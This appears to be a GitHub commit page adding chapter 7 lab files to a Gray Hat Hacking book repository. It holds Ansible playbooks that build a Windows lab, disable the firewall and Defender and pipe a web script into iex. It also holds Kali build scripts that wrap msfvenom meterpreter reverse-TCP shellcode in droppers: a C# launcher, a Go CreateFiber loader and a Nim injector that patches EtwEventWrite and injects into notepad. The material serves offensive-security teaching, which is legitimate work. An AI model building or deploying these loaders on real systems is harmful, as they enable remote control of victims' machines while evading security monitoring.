Skip to content

Commit

Permalink
Merge branch 'main' of github.com:GrayHatHacking/GHHv6
Browse files Browse the repository at this point in the history
  • Loading branch information
ergot86 committed Oct 12, 2021
2 parents f2cdf55 + 95f874a commit 9e24544
Show file tree
Hide file tree
Showing 52 changed files with 1,358 additions and 0 deletions.
4 changes: 4 additions & 0 deletions ch07/Lab/ansible/ansible.cfg
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
[defaults]
host_key_checking = False
enable_task_debugger = True

25 changes: 25 additions & 0 deletions ch07/Lab/ansible/ch07_playbook.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
---
- hosts: dc
roles:
- common
- windows_dns_server
- windows_domain_controller
- windows_domain_users_groups
vars_files:
- vars/vars.yml
- vars/users.yml
- hosts: target
gather_facts: yes
roles:
- common
- windows_client_join_domain
- target_customizations
vars_files:
- vars/vars.yml
- hosts: kali
become: yes
roles:
- kali_customizations
vars_files:
- vars/vars.yml
- vars/users.yml
2 changes: 2 additions & 0 deletions ch07/Lab/ansible/roles/common/defaults/main.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
---

1 change: 1 addition & 0 deletions ch07/Lab/ansible/roles/common/handlers/main.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
---
16 changes: 16 additions & 0 deletions ch07/Lab/ansible/roles/common/meta/main.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
---
galaxy_info:
role_name: install_misc_software
author: Russ Nolen rnolen@splunk.com
description: Install some basic software
license: BSD
min_ansible_version: 2.4
platforms:
- name: Windows
versions:
- 2012R2
- Win10
galaxy_tags:
- system
- security
dependencies: []
7 changes: 7 additions & 0 deletions ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
---
- name: Install Chocolately via Powershell
win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
"
- name: Install notepadplusplus
win_chocolatey:
name: notepadplusplus
9 changes: 9 additions & 0 deletions ch07/Lab/ansible/roles/common/tasks/main.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
---
# need to wrap an if statement around this one
# make it windows specific
- name : Disable Windows Firewall
win_firewall:
state: disabled
- include: windows-disable-defender.yml
when: ansible_distribution is search ('Microsoft')
- include: chocolatey-components.yml
6 changes: 6 additions & 0 deletions ch07/Lab/ansible/roles/common/tasks/windows-components.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
---
- name: Install the Visual C++ Redistributable
win_package:
path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
arguments: /install /passive /norestart
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
---

- name: Disable Windows Defender
win_regedit:
key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
value: DisableRealTimeMonitoring
datatype: dword
data: 1
8 changes: 8 additions & 0 deletions ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
[ghh]
comment = GHH Share
browseable = yes
path = /tmp
printable = no
guest ok = yes
read only = yes
create mask = 0700
10 changes: 10 additions & 0 deletions ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
--- /usr/share/kaboxer/covenant.kaboxer.orig 2021-09-12 19:28:35.392506176 +0000
+++ /usr/share/kaboxer/covenant.kaboxer.yaml 2021-09-12 18:54:26.224293412 +0000
@@ -26,6 +26,7 @@
publish_ports:
- 7443
- 443
+ - 80
before_run_script: |
#!/bin/sh
set -e
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
#!/bin/bash

SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`

# Replae relevant lines
SC=${SC/buf/shellcode}

PRE=`grep -B 1000 INJECT csharp.template | grep -v INJECT`
POST=`grep -A 1000 INJECT csharp.template | grep -v INJECT`

# Format the output
echo "$PRE" > csharp.cs
echo "$SC" >> csharp.cs
echo "$POST" >> csharp.cs

mcs csharp.cs -out:/tmp/csharp_dropper64.exe
chmod 755 /tmp/csharp_dropper64.exe
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
#!/bin/bash

SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.40`
CODE=`cat go.template`
# Replae relevant lines
CODE=${CODE/INJECT/$SC}
echo "$CODE" > createFiber.go

GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go
chmod 755 /tmp/CreateFiber.exe
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
#!/bin/bash

SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`

# Replae relevant lines
ORIG="byte[] buf = new byte["
FIX="var shellcode: array["
SC=${SC/$ORIG/$FIX}
SC=${SC/]/,byte] = }
SC=${SC/\}/]}
SC=${SC/{/\[ byte }
SC=${SC/;/}
SC=${SC/\[ \[/\[}
SC=${SC//[$'\n']}
CODE=`cat nim.template`
CODE=${CODE/INJECTHERE/$SC}
echo "$CODE" > dropper.nim

nim c -d=mingw -b=cpp --passL="-static-libgcc -static-libstdc++" --app=console --cpu=amd64 --out=/tmp/nim_dropper64.exe dropper.nim
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
using System;
using System.Runtime.InteropServices;


namespace GHHSCLauncher
{
class Program
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE = 0x10;

[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[DllImport("kernel32")]
static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);

[DllImport("kernel32")]
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );

[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds);

static void Main()
{
INJECT


UInt32 scAddress = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length);
uint prot;
VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;


hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}

}
}
Original file line number Diff line number Diff line change
@@ -0,0 +1,94 @@
import winim/lean
import strformat
import dynlib
import osproc

const patch: array[1, byte] = [byte 0xc3]

proc Patchntdll(): bool =
var
ntdll: LibHandle
cs: pointer
op: DWORD
t: DWORD
disabled: bool = false

ntdll = loadLib("ntdll")
if isNil(ntdll):
echo "[X] Failed to load ntdll.dll"
return disabled

cs = ntdll.symAddr("EtwEventWrite") # equivalent of GetProcAddress()
if isNil(cs):
echo "[X] Failed to get the address of 'EtwEventWrite'"
return disabled

if VirtualProtect(cs, patch.len, 0x40, addr op):
echo "[*] Applying patch"
copyMem(cs, unsafeAddr patch, patch.len)
VirtualProtect(cs, patch.len, op, addr t)
disabled = true

return disabled


proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
let tProcess = startProcess("notepad.exe")
tProcess.suspend() # That's handy!
defer: tProcess.close()

echo "[*] Target Process: ", tProcess.processID

let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)

echo "[*] pHandle: ", pHandle

let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)

var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)

echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""

let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)

echo "[*] tHandle: ", tHandle
echo "[+] Injected"

INJECTHERE

# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
var success = Patchntdll()
echo fmt"[*] ETW blocked by patch: {bool(success)}"
injectCreateRemoteThread(shellcode)
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
module createFiber.go

go 1.15

require golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
// Inspired by ired.team and Ne0nd0g's go-shellcode repository
// Reference: https://github.com/Ne0nd0g/go-shellcode
// Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber


package main

// import modules we'll need. We will need unsafe and the windows libraries to be able to
// launch shellcode. The winddows library let's us use DLLs and unsafe bypasses go
// restrictions around casting so that we can execute code

import (
"encoding/base64"
"fmt"
"unsafe"
"golang.org/x/sys/windows"
)

// Constants that we will need
const (
_MEM_COMMIT = 0x1000
_MEM_RESERVE = 0x2000
_PAGE_RWX = 0x40
)

func main() {


// shellcode in base64
sc := "INJECT"

shellcode, err := base64.StdEncoding.DecodeString(sc)
if err != nil {
fmt.Sprintf("Base64 Decoding Error: %s", err.Error())
return
}

// Load dlls
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
ntdll := windows.NewLazySystemDLL("ntdll.dll")

// memory creation/copy routines
VirtualAlloc := kernel32.NewProc("VirtualAlloc")
RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")

// Fiber creation routines
ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber")
CreateFiber := kernel32.NewProc("CreateFiber")
SwitchToFiber := kernel32.NewProc("SwitchToFiber")

// Only fibers can scedule fibers, so this convers the main thread into a fiber
_, _, err = ConvertThreadToFiber.Call()

if err != nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("ConvertThreadToFiber Failed: %s", err.Error())
return
}

// Create memory for our shellcode
addr, _, err:= VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)

if ((err != nil && err.Error() != "The operation completed successfully.") || addr == 0) {
fmt.Sprintf("VirtualAlloc Failed:%s", err.Error())
return
}

// Copy shellcode to our newly created memory
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

if err != nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("RtlCopyMemory Failed:%s", err.Error())
return
}

// Create Fiber to execute shellcode
fiber, _, err:= CreateFiber.Call(0, addr, 0)

if err!= nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("CreateFiber Failed:%s", err.Error())
return
}

// Switch to Fiber
SwitchToFiber.Call(fiber)


}
Loading

0 comments on commit 9e24544

Please sign in to comment.